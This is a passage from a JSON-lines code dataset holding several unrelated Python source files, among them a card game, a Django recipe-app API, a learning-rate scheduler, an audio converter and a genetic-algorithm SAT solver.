(TYPE 'h' or 'l'): \")\n choice = input()\n if choice == \"h\":\n print(\"The next card is: \", cards[j])\n print(\"\")\n if value.get(cards[j]) > value.get(cards[j-1]):\n print(\"Well done\")\n person.total+=1\n print(\"{}, has {} points\".format(person.name,person.total))\n else:\n print(\"Bad luck\")\n print(\"{}, finished with {} point(s)\".format(person.name,person.total))\n person.played = True\n return \"Game Over\"\n if person.total == 4:\n return \"Player wins\"\n elif choice == \"l\":\n print(\"The next card is: \", cards[j])\n print(\"\")\n if value.get(cards[j]) < value.get(cards[j-1]):\n print(\"Well done\")\n person.total+=1\n print(\"{}, has {} points\".format(person.name,person.total))\n else:\n print(\"Bad luck\")\n print(\"{}, finished with {} point(s)\".format(person.name,person.total))\n person.played = True\n return \"Game Over\"\n if person.total == 4:\n return \"Player wins\"\n\ndeck = list('23456789JQKA'*4)\ndeck.append(\"10\")\ndeck.append(\"10\")\ndeck.append(\"10\")\ndeck.append(\"10\")\nrandom.shuffle(deck)\nvalue = {'2':2, '3':3, '4':4, '5':5, '6':6, '7':7, '8':8,\n '9':9, '10':10, 'J':11, 'Q':12, 'K':13, 'A':14}\np1cards = [deck.pop() for _ in range(5)]\np2cards = [deck.pop() for _ in range(5)]\ncardSets = [p1cards,p2cards]\nlength = len(p1cards)\n\n#checks the set of cards for each player\nfor i in range(1,length):\n for j in range(1,length):#changed from j-1\n if p1cards[j] == p1cards[j-1]:\n p1cards.pop(j)\n newCard = deck.pop()\n p1cards.insert(j,newCard)\n#now for player 2's set\nfor i in range(1,length):\n for j in range(1,length):#changed from j-1\n if p2cards[j] == p2cards[j-1]:\n p2cards.pop(j)\n newCard = deck.pop()\n p2cards.insert(j,newCard)\n\nglobal totalGames\ntotalGames = 0\nglobal testStatus\ntestStatus = True\nQ1 = Question(\"How many fingers do we have?\", 8)\nQ2 = Question(\"How many tracks are there in Mario Kart 64?\",16)\nqList =[Q1,Q2]\nplayer1 = Player(\"James\",0,False)\nplayer2 = Player(\"Gavin\",0,False)\npList = [player1,player2]\ngame=Game()\ngame.test(player1,player2)\ngame.begin(player1,player2)\nprint(\"{}, had {}, and {}, had {}\".format(player1.name,player1.total,player2.name,player2.total))\n","repo_name":"riniguez91/year-13","sub_path":"high-or-low.py","file_name":"high-or-low.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28727665394","text":"\"\"\"Json Encoder utility\n\nTo invoke JSON encoder:\n\n```\n from relevanceai import json_encoder\n```\n\n\"\"\"\nimport math\nimport datetime\nimport dataclasses\nimport collections\nimport pandas as pd\n\nfrom ipaddress import IPv4Address, IPv4Interface, IPv4Network, IPv6Address, IPv6Interface, IPv6Network\n\nfrom enum import Enum\nfrom types import GeneratorType\nfrom uuid import UUID\nfrom collections import deque\nfrom pathlib import Path\nfrom pathlib import PurePath\nfrom types import GeneratorType\nfrom enum import Enum\nfrom typing import Any\n\n# Taken from pydanitc.json\nENCODERS_BY_TYPE = {\n bytes: lambda o: o.decode(),\n datetime.date: lambda o: o.isoformat(),\n datetime.datetime: lambda o: o.isoformat(),\n datetime.time: lambda o: o.isoformat(),\n datetime.timedelta: lambda td: td.total_seconds(),\n Enum: lambda o: o.value,\n frozenset: list,\n deque: list,\n GeneratorType: list,\n IPv4Address: str,\n IPv4Interface: str,\n IPv4Network: str,\n IPv6Address: str,\n IPv6Interface: str,\n IPv6Network: str,\n Path: str,\n set: list,\n UUID: str,\n}\n\n\ndef 
json_encoder(obj: Any, force_string: bool = False):\n \"\"\"Converts object so it is json serializable\n If you want to add your own mapping,\n customize it this way;\n\n Parameters\n ------------\n obj: Any\n The object to convert\n force_string: bool\n If True, forces the object to a string representation. Used mainly for\n analytics tracking.\n\n Example\n --------\n\n YOu can use our JSON encoder easily.\n >>> documents = [{\"value\": np.nan}]\n >>> client.json_encoder(documents)\n\n If you want to use FastAPI's json encoder, do this:\n >>> from fastapi import jsonable_encoder\n >>> client.json_encoder = jsonable_encoder\n\n \"\"\"\n from ai_transform.utils import DocumentList, Document\n\n # Loop through iterators and convert\n if isinstance(obj, (list, set, frozenset, GeneratorType, tuple, collections.deque)):\n encoded_list = []\n for item in obj:\n encoded_list.append(json_encoder(item, force_string=force_string))\n return encoded_list\n\n # Loop through dictionaries and convert\n if isinstance(obj, dict):\n encoded_dict = {}\n for key, value in obj.items():\n encoded_key = json_encoder(key, force_string=force_string)\n encoded_value = json_encoder(value, force_string=force_string)\n encoded_dict[encoded_key] = encoded_value\n return encoded_dict\n\n # Custom conversions\n if dataclasses.is_dataclass(obj):\n return dataclasses.asdict(obj)\n if isinstance(obj, Enum):\n return obj.value\n if isinstance(obj, PurePath):\n return str(obj)\n if isinstance(obj, (str, int, type(None))):\n return obj\n if isinstance(obj, float):\n if math.isnan(obj):\n return None\n return obj\n if isinstance(obj, (Document, DocumentList)):\n return obj.to_json()\n if type(obj) in ENCODERS_BY_TYPE:\n return ENCODERS_BY_TYPE[type(obj)](obj) # type: ignore\n\n if force_string:\n return repr(obj)\n\n if isinstance(obj, pd.Timestamp):\n return repr(obj)\n\n raise ValueError(f\"{obj} ({type(obj)}) cannot be converted to JSON format\")\n","repo_name":"RelevanceAI/ai-transform","sub_path":"ai_transform/utils/json_encoder.py","file_name":"json_encoder.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"72182068328","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nif __name__ == \"__main__\":\r\n t = int(input())\r\n\r\n for _ in range(t):\r\n n = int(input())\r\n sticker = []\r\n sticker.append(list(map(int, input().split())))\r\n sticker.append(list(map(int, input().split())))\r\n\r\n for i in range(1, n):\r\n if i == 1:\r\n sticker[0][i] += sticker[1][i-1]\r\n sticker[1][i] += sticker[0][i-1]\r\n else:\r\n sticker[0][i] += max(sticker[1][i-1], sticker[1][i-2], sticker[0][i-2])\r\n sticker[1][i] += max(sticker[0][i-1], sticker[0][i-2], sticker[1][i-2])\r\n\r\n if n == 1:\r\n print(max(sticker[0][0], sticker[1][0]))\r\n else:\r\n print(max(sticker[0][n-1], sticker[1][n-1], sticker[0][n-2], sticker[1][n-2]))\r\n","repo_name":"yerim10044001/ProblemSolving","sub_path":"백준/Silver/9465. 
스티커/스티커.py","file_name":"스티커.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36336798395","text":"from django.conf import settings\nfrom django.contrib.auth import authenticate\nfrom django.db.models import Sum\nfrom django.http import HttpResponse\nfrom rest_framework import mixins, permissions, status, viewsets\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.validators import ValidationError\nfrom rest_framework.views import APIView\n\nfrom api import serializers\nfrom recipes import models\nfrom users.models import Subscription, User\n\nfrom .filters import recipe_queryset_fiter\nfrom .pagination import RecipePagination\nfrom .permissions import IsAuthorOrReadOnly\n\n\nclass LoginView(APIView):\n permission_classes = [permissions.AllowAny]\n\n def post(self, request):\n email = request.data.get('email')\n password = request.data.get('password')\n user = authenticate(email=email, password=password)\n if user is not None:\n if not Token.objects.filter(user=user).exists():\n Token.objects.create(user=user)\n response = {'auth_token': user.auth_token.key}\n return Response(data=response, status=status.HTTP_201_CREATED)\n return Response(data={'message': 'Неверный email или пароль'})\n\n\nclass LogoutView(APIView):\n permission_classes = [permissions.IsAuthenticated]\n\n def post(self, request):\n user = request.user\n if user is not None:\n request.user.auth_token.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n return Response(data={'message': 'Пользователь не авторизван'})\n\n\nclass UserViewSet(\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet\n):\n queryset = User.objects.all()\n\n def get_permissions(self):\n if self.action in ('me', 'set_password', 'subscribe', 'subscriptions'):\n return [permissions.IsAuthenticated()]\n if self.action == 'destroy':\n return [IsAuthorOrReadOnly()]\n return super().get_permissions()\n\n def get_serializer_class(self):\n if self.request.method == 'POST':\n return serializers.SignUpSerializer\n return serializers.UserSerializer\n\n @action(detail=False, methods=['get'])\n def me(self, request):\n serializer = self.get_serializer(request.user)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['post'])\n def set_password(self, request):\n serializer = serializers.PasswordSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = request.user\n if user.check_password(serializer.data.get('current_password')):\n new_password = serializer.data.get('new_password')\n user.set_password(new_password)\n user.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n return Response(\n data={'message': 'Текущий пароль не совпадает'},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n @action(detail=True, methods=['post', 'delete'])\n def subscribe(self, request, pk):\n data = {'author': pk, 'subscriber': request.user.id}\n author = User.objects.filter(pk=pk).first()\n subscriber = request.user\n if request.method == 'POST':\n serializer = serializers.SubscribeSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n serializer = serializers.UserSerializer(\n instance=author, context={'request': request}\n )\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n elif 
request.method == 'DELETE':\n Subscription.objects.filter(\n author=author, subscriber=subscriber\n ).delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['get'])\n def subscriptions(self, request):\n params = request.query_params.get(\n 'recipes_limit',\n settings.DEFAULT_PAGE_SIZE,\n )\n context = self.get_serializer_context()\n try:\n context['recipes_limit'] = int(params)\n except ValueError:\n raise ValidationError({'message': 'recipes_limit не число'})\n queryset = self.get_queryset()\n queryset = queryset.filter(\n author__subscriber=request.user\n ).all()\n page = self.paginate_queryset(queryset=queryset)\n serializer = serializers.UserSubscribeSerializer(\n page,\n context=context,\n many=True\n )\n return self.get_paginated_response(serializer.data)\n\n\nclass TagViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = models.Tag.objects.all()\n serializer_class = serializers.TagSerializer\n pagination_class = None\n\n\nclass IngredientViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = models.Ingredient.objects.all()\n serializer_class = serializers.IngridientsSerializer\n pagination_class = None\n\n def get_queryset(self):\n queryset = models.Ingredient.objects\n name = self.request.query_params.get('name')\n if name:\n queryset = queryset.filter(name__istartswith=name)\n return queryset.all()\n\n\nclass RecipeViewSet(viewsets.ModelViewSet):\n pagination_class = RecipePagination\n\n def get_permissions(self):\n if self.action in (\n 'shopping_cart',\n 'favorite',\n 'download_shopping_cart'\n ):\n return [permissions.IsAuthenticated()]\n if self.action == 'destroy':\n return [IsAuthorOrReadOnly()]\n return super().get_permissions()\n\n def get_serializer_class(self):\n if self.action == 'shopping_cart':\n return serializers.ShoppingCartSerializer\n if self.action == 'favorite':\n return serializers.FavoriteSerializer\n if self.request.method in ('POST', 'PATCH'):\n return serializers.RecipeCreateUpdateSerializer\n return serializers.RecipeSerializer\n\n def get_queryset(self):\n user = self.request.user\n queryset = models.Recipe.objects.select_related(\n 'author').prefetch_related('tags', 'ingredients')\n queryset = queryset.annotate_quryset(user)\n queryset = recipe_queryset_fiter(queryset, self.request)\n return queryset\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n @action(detail=True, methods=['post', 'delete'])\n def shopping_cart(self, request, pk=None):\n return self._shopping_cart_favoite(pk, models.ShoppingCart)\n\n @action(detail=True, methods=['post', 'delete'])\n def favorite(self, request, pk=None):\n return self._shopping_cart_favoite(pk, models.Favorites)\n\n def _shopping_cart_favoite(self, pk, Klass):\n data = {'recipe': pk, 'user': self.request.user.id}\n item = models.Recipe.objects.filter(pk=data['recipe']).first()\n user = self.request.user\n if self.request.method == 'POST':\n serializer = self.get_serializer(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(\n data=serializers.RecipeFavoriteCartSerializer(\n instance=item\n ).data,\n status=status.HTTP_201_CREATED\n )\n elif self.request.method == 'DELETE':\n Klass.objects.filter(user=user, recipe=item).delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['get'])\n def download_shopping_cart(self, request):\n name = 'ingredient__name'\n unit = 'ingredient__measurement_unit'\n ingredients = 
models.IngredientInRecipe.objects.select_related(\n 'recipe',\n 'ingredient',\n ).filter(recipe__shopping_cart__user=request.user)\n ingredients = ingredients.values(\n name,\n unit,\n ).annotate(total=Sum('amount')).order_by('-total')\n catalog = '\\n'.join(f'{item[name]} - {item[\"total\"]} {item[unit]}'\n for item in ingredients) + settings.FILE_MESSAGE\n response = HttpResponse(catalog, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"text.txt\"'\n return response\n","repo_name":"bigfuto/foodgram","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30173994903","text":"from Networks import BitonicSort,OddEvenMergesort, PeriodicSort, RandShellSort, FourWaySort\nfrom Layerize import layerize\nfrom math import log2\n\ndef Touch(index, width, lines, cache):\n\thit = None\n\tfor entry in cache:\n\t\tif entry == index - index % width:\n\t\t\thit = entry\n\t\t\tbreak\n\tif hit != None:\n\t\tcache.remove(hit)\n\t\tcache.append(hit)\n\t\treturn 0\n\telse:\n\t\tcache.append(index - index % width)\n\t\tif len(cache) > lines:\n\t\t\tcache.pop(0)\n\t\treturn 1\n\n\nwidth = 4\nlines = 16\n\nfor N in [256, 512, 1024, 2048, 4096, 4096*2,4096*4]:\n\tcount = 0\n\tcache = []\n\tcomps = list(BitonicSort(range(N)))\n\tfor i, j in comps:\n\t\tcount += Touch(i, width, lines, cache)\n\t\tcount += Touch(j, width, lines, cache)\n\tprint(count/(N/width*(log2(N)-log2(width*lines))**2))\n\n\n\n\n","repo_name":"krismaz/Thesis","sub_path":"Other/Cache.py","file_name":"Cache.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22606973786","text":"from itertools import *\nimport unittest\nfrom answers import get_correct_answer\n\ndef solve():\n alphabet = ['Л', 'Е', 'Т', 'О']\n answer = 0\n for word in product(alphabet, repeat=5):\n if 'Е' in word:\n answer += 1\n return answer\n\nclass Problem43(unittest.TestCase):\n def test(self):\n assert str(solve()) == get_correct_answer(8, 43)\n\nif __name__ == '__main__':\n print(solve())","repo_name":"DmitryKochetkov/polyakov_py","sub_path":"solutions8/problem43.py","file_name":"problem43.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40398706419","text":"# -*- coding: utf-8 -*-\n\nimport math\n\nfrom ncc import LOGGER\nfrom . 
import NccLRScheduler, register_lr_scheduler\n\n\n@register_lr_scheduler('cosine')\nclass CosineSchedule(NccLRScheduler):\n \"\"\"Assign LR based on a cyclical schedule that follows the cosine function.\n\n See https://arxiv.org/pdf/1608.03983.pdf for details.\n\n We also support a warmup phase where we linearly increase the learning rate\n from some initial learning rate (``--warmup-init-lr``) until the configured\n max learning rate (``--max-lr``).\n\n During warmup::\n\n lrs = torch.linspace(args.warmup_init_lr, args.lr, args.warmup_updates)\n lr = lrs[update_num]\n\n After warmup::\n\n lr = lr_min + 0.5*(lr_max - lr_min)*(1 + cos(t_curr / t_i))\n\n where ``t_curr`` is current percentage of updates within the current period\n range and ``t_i`` is the current period range, which is scaled by ``t_mul``\n after every iteration.\n \"\"\"\n\n def __init__(self, args, optimizer):\n super().__init__(args, optimizer)\n if len(args['optimization']['lr']) > 1:\n raise ValueError(\n 'Cannot use a fixed learning rate schedule with cosine.'\n ' Consider --lr-scheduler=fixed instead.'\n )\n\n self.min_lr = max(args['optimization'].get('min_lr', 0), 0)\n self.max_lr = args['optimization'].get('max_lr', args['optimization']['lr'][0])\n\n self.warmup_init_lr = args['optimization'].get('warmup_init_lr', 0)\n warmup_end_lr = args['optimization'].get('warmup_end_lr', self.max_lr)\n\n assert self.max_lr > self.min_lr, 'max_lr must be more than lr'\n\n self.t_mult = args['optimization'].get('t_mult', 1.)\n\n if 'lr_period_updates' not in args['optimization']:\n LOGGER.warning('lr_period_updates has not been set and, therefore, set epoch_num * batch_num as default.')\n self.period = -1\n else:\n self.period = args['optimization']['lr_period_updates']\n\n if args['optimization']['warmup_updates'] > 0:\n # linearly warmup for the first args.warmup_updates\n self.lr_step = \\\n (warmup_end_lr - args['optimization']['warmup_init_lr']) / args['optimization']['warmup_updates']\n else:\n self.lr_step = 1\n\n self.warmup_updates = args['optimization']['warmup_updates']\n self.lr_shrink = args['optimization'].get('lr_shrink', 0.1)\n\n # initial learning rate\n self.lr = args['optimization']['warmup_init_lr']\n self.optimizer.set_lr(self.lr)\n\n def step(self, epoch, val_loss=None):\n \"\"\"Update the learning rate at the end of the given epoch.\"\"\"\n super().step(epoch, val_loss)\n # we don't change the learning rate at epoch boundaries\n return self.optimizer.get_lr()\n\n def step_update(self, num_updates):\n \"\"\"Update the learning rate after each update.\"\"\"\n if num_updates < self.warmup_updates:\n self.lr = self.warmup_init_lr + num_updates * self.lr_step\n else:\n curr_updates = num_updates - self.warmup_updates\n if self.t_mult != 1:\n i = math.floor(math.log(1 - curr_updates / self.period * (1 - self.t_mult), self.t_mult))\n t_i = self.t_mult ** i * self.period\n t_curr = curr_updates - (1 - self.t_mult ** i) / (1 - self.t_mult) * self.period\n else:\n i = math.floor(curr_updates / self.period)\n t_i = self.period\n t_curr = curr_updates - (self.period * i)\n\n lr_shrink = self.lr_shrink ** i\n min_lr = self.min_lr * lr_shrink\n max_lr = self.max_lr * lr_shrink\n\n self.lr = min_lr + 0.5 * (max_lr - min_lr) * (1 + math.cos(math.pi * t_curr / t_i))\n\n self.optimizer.set_lr(self.lr)\n return 
self.lr\n","repo_name":"CGCL-codes/naturalcc","sub_path":"ncc/optimizers/lr_schedulers/cosine_lr_scheduler.py","file_name":"cosine_lr_scheduler.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"20541067278","text":"import numpy as np\n\nfrom pyratslam import Ptree, LocalViewMatch\n\nptree = Ptree(\"config_irataus.txt\")\nratslam_settings = ptree.get_child(\"ratslam\")\n\nlv = LocalViewMatch(ratslam_settings)\na = np.zeros((300, 300))\nlv.on_image(a, True, 300, 300)\n","repo_name":"AtlasBuggy/ratslam-python","sub_path":"test_pyratslam.py","file_name":"test_pyratslam.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6886675765","text":"\nimport struct\nimport os\nimport tempfile\nimport sys\nfrom subprocess import Popen,PIPE\n\nclass RSO(object):\n\n def __init__(self, sample_rate=8000, body=\"\"):\n self.sample_rate = sample_rate\n self.body = body\n\n def dump(self):\n return self.header() + self.body\n\n def write(self, fname):\n with file(fname, \"w\") as f:\n f.write(self.dump())\n\n def header(self):\n header = struct.pack(\"HHH\",len(self.body),self.sample_rate,0)\n return header\n\n\n def set_body_from_list(self, l):\n self.body = struct.pack(\"<%iB\" %len(l),*l)\n\n def set_body_from_text(self, text):\n args = [\"gst-launch\",\"fdsrc\",\"fd=0\",\"!\",\"festival\",\"!\",\"wavparse\",\"!\", \n \"audioconvert\",\"!\",\n \"audioresample\",\"quality=10\",\"!\",\"audio/x-raw-int,rate=%i\"%self.sample_rate,\"!\", \n \"audioconvert\",\"!\",\"audio/x-raw-int,channels=1,width=8,depth=8,signed=false\",\"!\", \n \"fdsink\", \"fd=2\"]\n\n p = Popen(args,stdin=PIPE,stdout=PIPE,stderr=PIPE)\n\n junk,self.body = p.communicate(text)\n return junk\n\n def set_body_from_file(self, file):\n args = [\"gst-launch\",\"filesrc\",\"location=%s\"%file,\"!\",\"decodebin\",\"!\", \n \"audioconvert\",\"!\", \n \"audioresample\",\"quality=10\",\"!\",\"audio/x-raw-int,rate=%i\"%self.sample_rate,\"!\", \n \"audioconvert\",\"!\",\"audio/x-raw-int,channels=1,width=8,depth=8,signed=false\",\"!\", \n \"fdsink\", \"fd=2\"]\n\n p = Popen(args,stdout=PIPE,stderr=PIPE)\n\n junk,self.body = p.communicate()\n return junk\n\n\n \n \n\n \n\nif __name__ == \"__main__\":\n fin = sys.argv[1]\n fout = sys.argv[2]\n r = RSO()\n if os.path.isfile(fin):\n r.set_body_from_file(fin)\n else:\n r.set_body_from_text(fin)\n r.write(fout)\n\n\n \n","repo_name":"jbryan/nxt-tools","sub_path":"nxtools/sound/rso.py","file_name":"rso.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26992951583","text":"import click\nimport os\nimport yaml\nimport time\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom GA import ga\nfrom os import listdir\nfrom os.path import isfile, join\n\n\n@click.command()\n@click.option('-c', '--config', metavar='CONFIG', help=\"Config file in yaml format.\")\ndef solve(config):\n \"\"\"Method solve each problem with all parameters specific in configuration file.\"\"\"\n if config is None:\n print(\"You need to specify a configuration file.\")\n config = load_config(config)\n csv = WriteCSVData(config['out'] + \"_data\" + \".csv\", \",\")\n inst_id_counter = 0\n if os.path.isdir(config['in']):\n only_files = [config['in'] + \"/\" + f for f in listdir(config['in']) if isfile(join(config['in'], f))]\n 
for file in only_files:\n problem = load_problem(file)\n for gen_count in drange(*config['generationcount']):\n for gen_size in drange(*config['generationsize']):\n for mut in drange(*config['mutation']):\n for cross in drange(*config['crossover']):\n for t_size in drange(*config['selection']):\n t1 = time.time()\n score, generations, n_sol, n_clau, n_best_weight, satisfied = ga(*problem, gen_count,\n gen_size, mut,\n cross, t_size,\n config['elitism'],\n config[\n 'selection_add'],\n config['fitness'])\n csv.append_line({\"id\": inst_id_counter, \"gen_size\": gen_size, \"gen_count\": int(gen_count),\n \"mut\": mut, \"cross\": cross, \"elitism\": config['elitism'],\n \"t_size\": t_size, \"time\": time.time() - t1, \"score\": score,\n \"satisfied\": satisfied, \"n_var\": problem[0], \"n_clause\": problem[1]})\n\n base_file_name = config['out'] + str(inst_id_counter) + \"_v\" + \\\n str(problem[0]) + \"_c\" + str(problem[1])\n # Solutions plot\n some_basic_plot(n_sol, int(gen_count), base_file_name + \"_sol\" + \".pdf\", \"Počet řešení\",\n [0, n_sol.max() + 1])\n some_basic_plot(n_best_weight, int(gen_count), base_file_name + \"_weight\" + \".pdf\",\n \"Hodnota řešení\", None)\n\n # Generations plots with fitness and satisfied clause\n some_stats_plot(n_clau, base_file_name + \"_cla\" + \".pdf\", \"Počet splněných clausulí\")\n some_stats_plot(generations, base_file_name + \"_gen\" + \".pdf\",\n \"Fitness\")\n inst_id_counter += 1\n print(\"Problem solved.\", inst_id_counter, \"/\", len(only_files))\n else:\n print(\"Problems not a path with problems.\")\n\n\ndef some_basic_plot(data, size, file, y_label, y_range):\n fig = plt.figure(figsize=(20, 17))\n\n ax = fig.add_subplot(1, 1, 1)\n ax.scatter([j for j in range(size)], y=data, s=500, marker='o', c='blue')\n ax.set_ylabel(y_label, fontsize=60)\n ax.set_xlabel(\"Generace\", fontsize=60)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(40)\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(40)\n if y_range is not None:\n ax.set_ylim(y_range)\n plt.grid()\n ax.set_axisbelow(True)\n fig.savefig(file)\n plt.close(fig)\n\n\ndef some_stats_plot(data, file, y_label):\n test = pd.DataFrame(data)\n test['max'] = test.max(axis=1)\n test['mean'] = test.mean(axis=1)\n test['median'] = test.median(axis=1)\n test['min'] = test.min(axis=1)\n test['max_x'] = test['min']\n max_x = 0\n for i in test.index:\n if test['max'][i] > max_x:\n test.loc[i, 'max_x'] = test['max'][i]\n max_x = test['max'][i]\n else:\n test.loc[i, 'max_x'] = test['max_x'][i - 1]\n\n fig = plt.figure(figsize=(20, 17))\n ax = fig.add_subplot(1, 1, 1)\n linewidth = 4\n ax.plot(test['max'], linewidth=linewidth)\n ax.plot(test['mean'], linewidth=linewidth)\n ax.plot(test['median'], linewidth=linewidth)\n ax.plot(test['min'], linewidth=linewidth)\n ax.plot(test['max_x'], linewidth=linewidth)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(40)\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(40)\n ax.legend(['max (generation)', 'mean', 'median', 'minimum', 'max (start)'],\n bbox_to_anchor=(0.5, 0.0, 0, 0), fontsize=45, ncol=2,\n mode=\"expand\", frameon=False, loc='lower center')\n ax.set_ylabel(y_label, fontsize=60)\n ax.set_xlabel(\"Generace\", fontsize=60)\n\n fig.savefig(file)\n plt.close(fig)\n\n\ndef load_problem(file):\n \"\"\"Load problem form file in DIMACS format use weights in comments.\"\"\"\n with open(file, 'r') as file:\n to_read = []\n chars = file.read().split(\"\\n\")\n clause = []\n weights = []\n 
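# DIMACS parsing: 'c weights ...' comment lines carry the clause\n        # weights, 'p cnf <n_vars> <n_clauses>' gives the problem sizes, and\n        # the remaining token stream is split into clauses at every '0'.\n        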
cnt = 0\n n_c = 0\n n_v = 0\n for i in chars:\n if len(i) < 1:\n continue\n sp = i.strip().split()\n if sp[0] == 'c' and len(sp) > 1 and sp[1] == 'weights':\n weights = sp[2:]\n continue\n if sp[0] == 'c':\n continue\n if sp[0] == 'p':\n ind, problem, n_v, n_c = i.split()\n if problem.lower() != 'cnf':\n print('Can\\'t solve not cnf problem')\n return\n n_v = int(n_v)\n n_c = int(n_c)\n continue\n for j in sp:\n to_read.append(j)\n\n for j, k in enumerate(to_read):\n if k == '0':\n clause.append(to_read[:j])\n to_read = to_read[j + 1:]\n cnt += 1\n break\n if cnt >= n_c:\n break\n return n_v, n_c, weights, clause\n\n\ndef drange(start, stop, step):\n \"\"\"Range for double values.\"\"\"\n r = start\n while r < stop:\n yield r\n r += step\n\n\nclass WriteCSVData:\n \"\"\"Create file in csv format for writing stats.\"\"\"\n\n def __init__(self, file, sep=\",\"):\n self.file = open(file, 'w')\n self.head = None\n self.sep = sep\n\n \"\"\"Append one line to file, if it is first line -> create header\"\"\"\n\n def append_line(self, kwargs):\n if self.head is not None:\n self.write_line(kwargs)\n else:\n self.write_head(kwargs)\n self.write_line(kwargs)\n\n def write_head(self, kwargs):\n self.head = []\n for key in kwargs:\n self.head.append(key)\n self.file.write(self.sep.join([str(key) for key in self.head]) + \"\\n\")\n\n def write_line(self, kwargs):\n self.file.write(self.sep.join([str(kwargs[key]) for key in self.head]) + \"\\n\")\n self.file.flush()\n\n\ndef load_config(configuration_file):\n \"\"\"Load configuration from configuration file for one experimental run.\"\"\"\n config = {}\n with open(configuration_file, 'r') as configuration:\n cfg = yaml.load(configuration)\n if 'RUN' in cfg:\n tmp = cfg['RUN']\n if \"out\" in tmp:\n config['out'] = tmp['out']\n else:\n config['out'] = \"out\"\n if \"in\" in tmp:\n config['in'] = tmp['in']\n else:\n print(\"No inst to solve.\")\n exit(1)\n else:\n print(\"Configuration fail. See example.\")\n exit(1)\n if 'GA' in cfg:\n tmp = cfg['GA']\n for i in ['generationsize', 'generationcount', 'mutation', 'crossover', 'selection']:\n if i in tmp:\n if type(tmp[i]) is int or type(tmp[i]) is float:\n config[i] = [tmp[i], tmp[i] + 1, 2]\n continue\n s = tmp[i].split()\n if len(s) == 3:\n config[i] = [float(s[0]), float(s[1]), float(s[2])]\n continue\n print(\"Bad values\", i, \"please repair in config.\")\n exit(1)\n else:\n print(\"Not specific\", i, \"please add to config.\")\n exit(1)\n if 'elitism' in tmp:\n config['elitism'] = int(tmp['elitism'])\n else:\n config['elitism'] = 0\n if 'selection_add' in tmp:\n config['selection_add'] = int(tmp['selection_add'])\n else:\n config['selection_add'] = 0\n if 'fitness' in tmp:\n config['fitness'] = float(tmp['fitness'])\n else:\n config['fitness'] = 0.5\n else:\n print(\"Configuration fail. 
See example.\")\n exit(1)\n return config\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"martilad/MI-PAA2018","sub_path":"task5/WCNFSolver.py","file_name":"WCNFSolver.py","file_ext":"py","file_size_in_byte":9560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16215256720","text":"import sys\n\nmul = lambda: map(int, input().strip().split())\nseq = lambda: list(map(int, input().strip().split()))\nreadInt = lambda: int(input())\nreadLine = lambda: input().strip()\nsys.stdin = open(\"blocks.in\", \"r\")\nsys.stdout = open(\"blocks.out\", \"w\")\n\ndef computeFreq(s):\n freq = [0 for i in range(26)]\n for c in s:\n freq[ord(c) - ord('a')] += 1\n\n return freq\n\n\nn = readInt()\nans = [0 for i in range(26)]\nfor i in range(n):\n s1, s2 = input().strip().split()\n f1, f2 = computeFreq(s1), computeFreq(s2)\n for j in range(26):\n ans[j] += max(f1[j], f2[j])\n\nprint(*ans, sep='\\n')\n","repo_name":"adnaneaabbar/USACO-Guide","sub_path":"blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"23191909014","text":"import argparse\nimport sys\n\n# File format is [instance id] [individual_id] [library list]\n# return dictionaries of:\n# 1. instance_ids -> library id list and \n# 2. instance_ids -> individuals\ndef instances_maps(filename):\n\tinstances = {}\n\tinstance_to_individual = {}\n\twith open(filename) as f:\n\t\tfor line in f:\n\t\t\tfields = line.split()\n\t\t\tinstance_id = 